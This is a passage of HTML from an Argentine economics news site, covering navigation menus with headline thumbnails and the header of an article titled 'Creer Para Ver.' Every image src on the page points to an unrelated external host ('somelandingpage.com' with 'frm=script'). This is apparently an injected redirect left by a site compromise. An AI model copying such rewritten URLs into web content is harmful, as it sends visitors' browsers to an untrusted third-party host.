                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/visa-nueva-generacion-en-tarjetas/" rel="bookmark" title="Visa: ¿Nueva generación en tarjetas?"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/Visa-Data-Center-180x135.jpg" alt="" title="Visa: ¿Nueva generación en tarjetas?"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/visa-nueva-generacion-en-tarjetas/" rel="bookmark" title="Visa: ¿Nueva generación en tarjetas?">Visa: ¿Nueva generación en tarjetas?</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/la-tasa-rosa-ser-mujer-es-cada-vez-mas-caro/" rel="bookmark" title="La &#8220;tasa rosa&#8221;: ser mujer es cada vez más caro"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/tasa_rosa-180x135.jpg" alt="" title="La &#8220;tasa rosa&#8221;: ser mujer es cada vez más caro"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/la-tasa-rosa-ser-mujer-es-cada-vez-mas-caro/" rel="bookmark" title="La &#8220;tasa rosa&#8221;: ser mujer es cada vez más caro">La &#8220;tasa rosa&#8221;: ser mujer es cada vez más caro</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5c6d09e221d5b" data-td_block_id="td_uid_1_5c6d09e221d5b"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5c6d09e221d5b" data-td_block_id="td_uid_1_5c6d09e221d5b"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-3259"><a href="http://prensaeconomica.com.ar/economia/">Economía</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_2_5c6d09e22477e = new tdBlock();
block_td_uid_2_5c6d09e22477e.id = "td_uid_2_5c6d09e22477e";
block_td_uid_2_5c6d09e22477e.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"112","show_child_cat":5,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_block_id_411391088 td_uid_2_5c6d09e22477e_rand"}';
block_td_uid_2_5c6d09e22477e.td_column_number = "3";
block_td_uid_2_5c6d09e22477e.block_type = "td_block_mega_menu";
block_td_uid_2_5c6d09e22477e.post_count = "5";
block_td_uid_2_5c6d09e22477e.found_posts = "138";
block_td_uid_2_5c6d09e22477e.header_color = "";
block_td_uid_2_5c6d09e22477e.ajax_pagination_infinite_stop = "";
block_td_uid_2_5c6d09e22477e.max_num_pages = "28";
tdBlocksArray.push(block_td_uid_2_5c6d09e22477e);
</script><div class="td_block_wrap td_block_mega_menu td_block_id_411391088 td_uid_2_5c6d09e22477e_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_2_5c6d09e22477e class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/vaca-muerta-que-el-boom-de-2018-se-sostenga/" rel="bookmark" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/02/vaca-muerta-180x135.jpg" alt="" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/vaca-muerta-que-el-boom-de-2018-se-sostenga/" rel="bookmark" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga">Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/el-prestigio-si-se-mide/" rel="bookmark" title="El PRESTIGIO sí se mide"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/prestigio-180x135.jpg" alt="" title="El PRESTIGIO sí se mide"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/el-prestigio-si-se-mide/" rel="bookmark" title="El PRESTIGIO sí se mide">El PRESTIGIO sí se mide</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/casa-propia-un-imposible-para-la-clase-media-portena/" rel="bookmark" title="Casa propia: Un imposible para la clase media porteña"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/CASA-PROPIA-180x135.jpg" alt="" title="Casa propia: Un imposible para la clase media porteña"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/casa-propia-un-imposible-para-la-clase-media-portena/" rel="bookmark" title="Casa propia: Un imposible para la clase media porteña">Casa propia: Un imposible para la clase media porteña</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/cae-la-industria-argentina/" rel="bookmark" title="Cae la industria argentina"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/11/industrial-180x135.jpg" alt="" title="Cae la industria argentina"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/cae-la-industria-argentina/" rel="bookmark" title="Cae la industria argentina">Cae la industria argentina</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/la-economia-argentina-desconcierta-nuevamente-a-los-agentes-economicos/" rel="bookmark" title="La economía argentina desconcierta (nuevamente) a los agentes económicos"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/11/incertidumbre-180x135.jpg" alt="" title="La economía argentina desconcierta (nuevamente) a los agentes económicos"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/la-economia-argentina-desconcierta-nuevamente-a-los-agentes-economicos/" rel="bookmark" title="La economía argentina desconcierta (nuevamente) a los agentes económicos">La economía argentina desconcierta (nuevamente) a los agentes económicos</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5c6d09e22477e" data-td_block_id="td_uid_2_5c6d09e22477e"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_2_5c6d09e22477e" data-td_block_id="td_uid_2_5c6d09e22477e"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-3260"><a href="http://prensaeconomica.com.ar/negocios/">Negocios</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_3_5c6d09e226edb = new tdBlock();
block_td_uid_3_5c6d09e226edb.id = "td_uid_3_5c6d09e226edb";
block_td_uid_3_5c6d09e226edb.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"463","show_child_cat":5,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_block_id_893308884 td_uid_3_5c6d09e226edb_rand"}';
block_td_uid_3_5c6d09e226edb.td_column_number = "3";
block_td_uid_3_5c6d09e226edb.block_type = "td_block_mega_menu";
block_td_uid_3_5c6d09e226edb.post_count = "5";
block_td_uid_3_5c6d09e226edb.found_posts = "27";
block_td_uid_3_5c6d09e226edb.header_color = "";
block_td_uid_3_5c6d09e226edb.ajax_pagination_infinite_stop = "";
block_td_uid_3_5c6d09e226edb.max_num_pages = "6";
tdBlocksArray.push(block_td_uid_3_5c6d09e226edb);
</script><div class="td_block_wrap td_block_mega_menu td_block_id_893308884 td_uid_3_5c6d09e226edb_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_3_5c6d09e226edb class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/vaca-muerta-que-el-boom-de-2018-se-sostenga/" rel="bookmark" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/02/vaca-muerta-180x135.jpg" alt="" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/vaca-muerta-que-el-boom-de-2018-se-sostenga/" rel="bookmark" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga">Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/boom-blockchain-4-de-cada-5-ceos-interesados/" rel="bookmark" title="&#8220;Boom&#8221; Blockchain (4 de cada 5 CEOs interesados)"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/02/block-chain-180x135.jpg" alt="" title="&#8220;Boom&#8221; Blockchain (4 de cada 5 CEOs interesados)"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/boom-blockchain-4-de-cada-5-ceos-interesados/" rel="bookmark" title="&#8220;Boom&#8221; Blockchain (4 de cada 5 CEOs interesados)">&#8220;Boom&#8221; Blockchain (4 de cada 5 CEOs interesados)</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/desembarca-start-up-de-logistica-mano-a-mano/" rel="bookmark" title="Desembarca start up de Logística &#8220;mano a mano&#8221;"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/servicio-entrega-mano-180x135.jpg" alt="" title="Desembarca start up de Logística &#8220;mano a mano&#8221;"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/desembarca-start-up-de-logistica-mano-a-mano/" rel="bookmark" title="Desembarca start up de Logística &#8220;mano a mano&#8221;">Desembarca start up de Logística &#8220;mano a mano&#8221;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/nueva-estrategia-en-aerolineas/" rel="bookmark" title="Nueva estrategia en Aerolíneas"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/10/aero-web-180x135.png" alt="" title="Nueva estrategia en Aerolíneas"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/nueva-estrategia-en-aerolineas/" rel="bookmark" title="Nueva estrategia en Aerolíneas">Nueva estrategia en Aerolíneas</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/swiss-medical-construye-un-sanatorio-en-nordelta/" rel="bookmark" title="Swiss Medical construye un sanatorio en Nordelta"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/06/Julio-Zamora-Claudio-Belocopitt-Eduardo-Costantini-Palada-Inicial-2-180x135.jpg" alt="" title="Swiss Medical construye un sanatorio en Nordelta"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/swiss-medical-construye-un-sanatorio-en-nordelta/" rel="bookmark" title="Swiss Medical construye un sanatorio en Nordelta">Swiss Medical construye un sanatorio en Nordelta</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_5c6d09e226edb" data-td_block_id="td_uid_3_5c6d09e226edb"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_3_5c6d09e226edb" data-td_block_id="td_uid_3_5c6d09e226edb"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-3261"><a href="http://prensaeconomica.com.ar/ocio-tiempo-libre/">Tiempo Libre</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_4_5c6d09e2291f3 = new tdBlock();
block_td_uid_4_5c6d09e2291f3.id = "td_uid_4_5c6d09e2291f3";
block_td_uid_4_5c6d09e2291f3.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"57","show_child_cat":5,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_block_id_3125605006 td_uid_4_5c6d09e2291f3_rand"}';
block_td_uid_4_5c6d09e2291f3.td_column_number = "3";
block_td_uid_4_5c6d09e2291f3.block_type = "td_block_mega_menu";
block_td_uid_4_5c6d09e2291f3.post_count = "5";
block_td_uid_4_5c6d09e2291f3.found_posts = "24";
block_td_uid_4_5c6d09e2291f3.header_color = "";
block_td_uid_4_5c6d09e2291f3.ajax_pagination_infinite_stop = "";
block_td_uid_4_5c6d09e2291f3.max_num_pages = "5";
tdBlocksArray.push(block_td_uid_4_5c6d09e2291f3);
</script><div class="td_block_wrap td_block_mega_menu td_block_id_3125605006 td_uid_4_5c6d09e2291f3_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_4_5c6d09e2291f3 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/la-cava-del-querandi-historica-y-romantica/" rel="bookmark" title="La Cava del Querandí, histórica y romántica"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/02/cava-180x135.jpg" alt="" title="La Cava del Querandí, histórica y romántica"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/la-cava-del-querandi-historica-y-romantica/" rel="bookmark" title="La Cava del Querandí, histórica y romántica">La Cava del Querandí, histórica y romántica</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/dos-atletas-mundiales-en-la-10a-edicion-de-patagonia-run-mhw/" rel="bookmark" title="Dos atletas mundiales en la 10ª edición de Patagonia Run MHW"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/Pau-Capell-180x135.jpg" alt="" title="Dos atletas mundiales en la 10ª edición de Patagonia Run MHW"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/dos-atletas-mundiales-en-la-10a-edicion-de-patagonia-run-mhw/" rel="bookmark" title="Dos atletas mundiales en la 10ª edición de Patagonia Run MHW">Dos atletas mundiales en la 10ª edición de Patagonia Run MHW</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/una-salida-para-revolucionar-el-pensamiento/" rel="bookmark" title="Un lugar para revolucionar el pensamiento"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/07/3d-imprimir-el-mundo-180x135.jpg" alt="" title="Un lugar para revolucionar el pensamiento"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/una-salida-para-revolucionar-el-pensamiento/" rel="bookmark" title="Un lugar para revolucionar el pensamiento">Un lugar para revolucionar el pensamiento</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/celebrar-con-espumantes/" rel="bookmark" title="Celebrar con espumantes"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/11/LINEACOMPLETA-suter-180x135.png" alt="" title="Celebrar con espumantes"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/celebrar-con-espumantes/" rel="bookmark" title="Celebrar con espumantes">Celebrar con espumantes</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/innovando-con-nueva-carta/" rel="bookmark" title="Cambio de estación en Euskadi"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/11/sagardiweb-180x135.png" alt="" title="Cambio de estación en Euskadi"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/innovando-con-nueva-carta/" rel="bookmark" title="Cambio de estación en Euskadi">Cambio de estación en Euskadi</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_4_5c6d09e2291f3" data-td_block_id="td_uid_4_5c6d09e2291f3"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_4_5c6d09e2291f3" data-td_block_id="td_uid_4_5c6d09e2291f3"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-3262"><a href="http://prensaeconomica.com.ar/opiniones/">Opiniones</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_5_5c6d09e22b8b9 = new tdBlock();
block_td_uid_5_5c6d09e22b8b9.id = "td_uid_5_5c6d09e22b8b9";
block_td_uid_5_5c6d09e22b8b9.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"114","show_child_cat":5,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_block_id_1760707222 td_uid_5_5c6d09e22b8b9_rand"}';
block_td_uid_5_5c6d09e22b8b9.td_column_number = "3";
block_td_uid_5_5c6d09e22b8b9.block_type = "td_block_mega_menu";
block_td_uid_5_5c6d09e22b8b9.post_count = "5";
block_td_uid_5_5c6d09e22b8b9.found_posts = "60";
block_td_uid_5_5c6d09e22b8b9.header_color = "";
block_td_uid_5_5c6d09e22b8b9.ajax_pagination_infinite_stop = "";
block_td_uid_5_5c6d09e22b8b9.max_num_pages = "12";
tdBlocksArray.push(block_td_uid_5_5c6d09e22b8b9);
</script><div class="td_block_wrap td_block_mega_menu td_block_id_1760707222 td_uid_5_5c6d09e22b8b9_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_5_5c6d09e22b8b9 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/el-panorama-politico-por-rosendo-fraga/" rel="bookmark" title="El Panorama Político, por Rosendo Fraga"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2019/01/poltica-2-180x135.jpg" alt="" title="El Panorama Político, por Rosendo Fraga"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/el-panorama-politico-por-rosendo-fraga/" rel="bookmark" title="El Panorama Político, por Rosendo Fraga">El Panorama Político, por Rosendo Fraga</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/solanet-este-es-el-momento-de-reformar-el-estado/" rel="bookmark" title="Solanet: “Este es el momento de reformar el Estado”"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/11/solanet-180x135.jpg" alt="" title="Solanet: “Este es el momento de reformar el Estado”"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/solanet-este-es-el-momento-de-reformar-el-estado/" rel="bookmark" title="Solanet: “Este es el momento de reformar el Estado”">Solanet: “Este es el momento de reformar el Estado”</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/a-pasar-el-invierno-esperando-una-buena-cosecha/" rel="bookmark" title="A pasar el invierno (esperando una buena cosecha)"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/07/nevada-180x135.jpg" alt="" title="A pasar el invierno (esperando una buena cosecha)"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/a-pasar-el-invierno-esperando-una-buena-cosecha/" rel="bookmark" title="A pasar el invierno (esperando una buena cosecha)">A pasar el invierno (esperando una buena cosecha)</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/la-reserva-federal-de-eeuu-subio-la-tasa-y-ahora/" rel="bookmark" title="La Reserva Federal de EEUU subió la tasa: ¿y ahora?"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/07/FED-TASAS-180x135.jpg" alt="" title="La Reserva Federal de EEUU subió la tasa: ¿y ahora?"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/la-reserva-federal-de-eeuu-subio-la-tasa-y-ahora/" rel="bookmark" title="La Reserva Federal de EEUU subió la tasa: ¿y ahora?">La Reserva Federal de EEUU subió la tasa: ¿y ahora?</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/para-que-ya-no-lloren-e-inviertan-cambiemos/" rel="bookmark" title="Para que ya no “lloren” e inviertan: cambiemos"><img width="180" height="135" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/uploads/2018/03/emoticon-triste-180x135.jpg" alt="" title="Para que ya no “lloren” e inviertan: cambiemos"/></a></div>                            </div>

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/para-que-ya-no-lloren-e-inviertan-cambiemos/" rel="bookmark" title="Para que ya no “lloren” e inviertan: cambiemos">Para que ya no “lloren” e inviertan: cambiemos</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_5c6d09e22b8b9" data-td_block_id="td_uid_5_5c6d09e22b8b9"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_5c6d09e22b8b9" data-td_block_id="td_uid_5_5c6d09e22b8b9"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5677"><a href="http://prensaeconomica.com.ar/pases/">Pases</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5678"><a href="http://prensaeconomica.com.ar/eventos/">Eventos</a></li>
</ul></div></div>

<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form role="search" method="get" class="td-search-form" action="http://prensaeconomica.com.ar/">
				<div class="td-head-form-search-wrap">
					<input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Buscar" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>        </div>
    </div>
</div>
    <div class="td-container td-post-template-default">
        <div class="td-container-border">
            <div class="td-pb-row">
                                            <div class="td-pb-span8 td-main-content" role="main">
                                <div class="td-ss-main-content">
                                    

    <article id="post-6729" class="post-6729 post type-post status-publish format-standard has-post-thumbnail hentry category-rse-sustentabilidad tag-escuela tag-natura tag-vuelta-al-cole" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header td-pb-padding-side">
            <div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://prensaeconomica.com.ar/"><span itemprop="title">Inicio</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="Ver todas las publicaciones en RSE &amp;amp; Sustentabilidad" class="entry-crumb" itemprop="url" href="http://prensaeconomica.com.ar/rse-sustentabilidad/"><span itemprop="title">RSE &amp; Sustentabilidad</span></a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "Creer Para Ver."><meta itemprop="url" content = "http://prensaeconomica.com.ar/creer-para-ver/">Creer Para Ver.</span></div>
            <ul class="td-category"><li class="entry-category"><a  href="http://prensaeconomica.com.ar/rse-sustentabilidad/">RSE &amp; Sustentabilidad</a></li></ul>
            <header>
                <h1 class="entry-title">Creer Para Ver.</h1>

                

                <div class="meta-info">

